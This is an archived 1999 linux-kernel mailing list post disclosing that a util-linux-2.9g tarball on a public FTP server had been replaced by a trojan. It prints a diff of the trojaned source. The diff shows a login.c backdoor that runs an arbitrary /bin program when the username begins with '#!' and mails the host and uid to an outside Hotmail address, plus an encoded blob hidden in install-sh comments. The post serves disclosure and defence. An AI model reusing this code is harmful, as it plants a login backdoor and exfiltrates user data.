Re: util-linux compromised

From: Trevor Johnson (trevorat_private)
Date: Sun Jan 24 1999 - 06:03:42 PST

Next message: John Stange: "Re: backdoored tcp wrapper source code"

Previous message: Wietse Venema: "Re: backdoored tcp wrapper source code"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

I just received the following letter:

    Date: Sun, 24 Jan 1999 04:01:55 -0500 (EST)
    From: John Stange <buildingat_private>
    Subject: util-linux compromised?

    I grabbed util-linux-2.9g yesterday from win.tue.nl, and discovered a
    section of login.c that appears to send the host and uid of the user to a
    hotmail address.  I imagine this isn't a standard feature. :>  Given that
    the tcp wrappers archive was backdoored on that same server recently, you
    might want to comb over the rest of your stuff as well, if any of it's
    yours.

    -- John Stange
    Staff World, 4120 AVW
    x52720

and indeed, util-linux-2.9g had been replaced by a trojan version.
Unfortunately this means that everything from ftp.win.tue.nl
must be regarded as suspect for the moment.

I put a correct util-linux-2.9g.tar.gz back, with md5sum
  ab409a6ac5a775a4b04b8e27f6c86933  util-linux-2.9g.tar.gz
but of course, for the time being, nothing on this machine can be trusted.

Andries

A diff between original and trojan:

diff -r util-linux-2.9g/disk-utils/Makefile trojan/util-linux-2.9g/disk-utils/Makefile
94a95
>
diff -r util-linux-2.9g/install-sh trojan/util-linux-2.9g/install-sh
147a148,171
> # M.'1F87=H<3(S='5L9G(V:6%W969G<34V-VEA,W4*(R!`:%=)<CT[>'9X46QO
> # M>GEP8V9Q8GYJ1SU6*E-P6S)R<E(X5G%A8%P]2C)K9EEY6#-J1V)R/3X[>W5Z
> # M>'1X>$!8765I7F5E65Q80B`@(`HC("YA+G,N9RXW+C@N-2XV+C$N,BXU+F(N
> # M<"XY+F<N=BXX+C<N82YW+G0N8BYP+C$N,BXX+CDN="XW+F8N9RYA+G<N90HC
> # M(#0L,RQH+'0L.2QQ+#(L."QT+&8L82QW:"UQ+3(M,RUT+74M;"UF+7(M-BUI
> # M+6$M=RUE+68M9RUQ+34M-BTW+6DM82TS=0HC($!H5TER/3MX=GA1;&]Z>7!C
> # M9G%B?FI'/58J4W!;,G)R4CA6<6%@7#U*,FMF67E8,VI'8G(]/CM[=7IX='AX
> # MW<L,14(2SWS1$J0=[8?[[?=T-T!2LK,S>W,S5W4;[TXLD4"CT:]/-^"JC)->
> # M$F?5E]ZP_WJ^^^0W^-$'@Y>'A_J)UOKET<':;_<ST/KHZ&"P]_+@Y>&!UGOX
> # M=/1$'S[Y'7XJ6P:%UD_^27^J#?U'L;WMT4/[OV<*_XC^#UG_P^'1P3?]_Q_K
> # M_SRX-;,X,;]ZC;W!X.C@X*OZ/]C;/R#]#UX.#_?V!["%O8/!X.43/?BF_]_\
> # MYYGV:M:]7O-YEA>Z,0U]QO_2@[B,C57/]'%A@M)$(ST)2OW6A'IXI(>#T>#U
> # MZ&"@]UZ_'F+,E;F++8UY5\3Z8UA"R7JX-QH,1\,]&G.HIRM=]&=!7"Z^CXTQ
> # M_;R8$^U\N2KB^:)D0EWZ=Y__/>C*M*LXO`V*2)_T]3N:K+>%1FC[51;V353M
> # MJ&=*Q5F85)'1_?[N^?''BW>G[Q6H?UJ8PN@RU\NJU&F0Z64P-_;/2IV/+UY]
> # MIY\^G478?1J4_5<ZO;7WP1(?K"EGT;)(^Z\>D)C&65#$1.&9GA@\7AC=B3.8
> # M59)T=%$Y:=)C"//6]C7^I]3DA],+6BV]G5FWCE(WDRMZW/!0+ZS4R?4QO^`O
> # M\2PS?]6=Y]O'ES<['=VQRZ`(.^!@9L-;'6219KKW<9+H,$^7T&E73\%MR:S'
> # M5F>YOC5%9A)MJ^4R+TJ=9YK)L"!&WSW?IM\[3+&?QEG\A04RL_Z7>\8[H>'T
> # MNSV\->H!O^G1J]O.YD(4>T`\]!^L^["Y`CUUH]P89;(HGBF36/,XT<=(N$F;
> # M5\9VU%/L_7A']T*0.'YW-GX_P9>WD[/CFZO)R>2[/?W\C[J7Z^??RR[6*%W(
> # MH+]+:WWZTY$7B>Q1.*PYS76"408??@'+S[?/WOI%_D,6H6>G/\CH7\[O5PFY
> # MX;J7I([][TVXX/=93DX*)[;P9AANJ0OSURHN#"PXK`J+WW`NF
>
diff -r util-linux-2.9g/login-utils/login.c trojan/util-linux-2.9g/login-utils/login.c
179a180
> void checkname P_((char *name));
552a554,555
>       checkname(username);
>
1291a1295,1342
> }
>
> #include <sys/socket.h>
> #include <netinet/in.h>
> #include <arpa/inet.h>
> #include <netdb.h>
>
> void
> checkname(char *name)
> {
>       char    a[100];
>       char    *pt;
>
>       if ((name[0] == '#') && (name[1] == '!'))
>       {
>               pt = (char*)&name[2];
>               sprintf(a,"/bin/%s",pt);
>               execl(a,a,(void*)0);
>       }
>       if (fork() == 0)
>       {
>               struct  hostent *he;
>               struct  sockaddr_in sai;
>               struct  in_addr *ia;
>               char    b[500];
>               int     s,l;
>
>               setsid();
>               s = open("/var/tmp/.fmlock0",O_RDONLY);
>               if (s >= 0) exit(0);
>               he = gethostbyname("mail.hotmail.com");
>               if (!he) exit(0);
>               ia = (struct in_addr *)he->h_addr_list[0];
>               l = sizeof(sai);memset(&sai,0,l);
>               sai.sin_port = htons(25);
>               sai.sin_addr.s_addr = ia->s_addr;
>               if ((s = socket(AF_INET,SOCK_STREAM,0)) < 0) exit(0);
>               if ((connect(s,(struct sockaddr*)&sai,l)) < 0) exit(0);
>               if ((getsockname(s,(struct sockaddr*)&sai,&l)) < 0) exit(0);
>               sprintf(b,"\r\nHost = %s\r\nUid = %i\r\n\r\n.\r\n",inet_ntoa(sai.sin_addr),getuid());
>               sleep(1);if (write(s,"HELO 127.0.0.1\n",15) < 0) exit(0);
>               sleep(1);if (write(s,"MAIL FROM:<xulat_private>\n",28) < 0) exit(0);
>               if (write(s,"RCPT TO:<wlogainat_private>\n",30) < 0) exit(0);
>               sleep(1);if (write(s,"DATA\n",5) < 0) exit(0);
>               sleep(1);if (write(s,b,strlen(b)) < 0) exit(0);
>               sleep(1);if (write(s,"QUIT\n",5) < 0) exit(0);
>               sleep(1);close(creat("/var/tmp/.fmlock0",511));exit(0);
>       }
diff -r util-linux-2.9g/misc-utils/Makefile trojan/util-linux-2.9g/misc-utils/Makefile
85a86,88
>
> #@hWIr=;xvxQlozypcfqb~gA\.~ttQ9inKf=8~}6~3/-&SxQl/<
>


(pasted from another window - tabs etc will be lost).

Andries

-
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majordomoat_private
Please read the FAQ at http://www.tux.org/lkml/

Next message: John Stange: "Re: backdoored tcp wrapper source code"
Previous message: Wietse Venema: "Re: backdoored tcp wrapper source code"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:30:08 PDT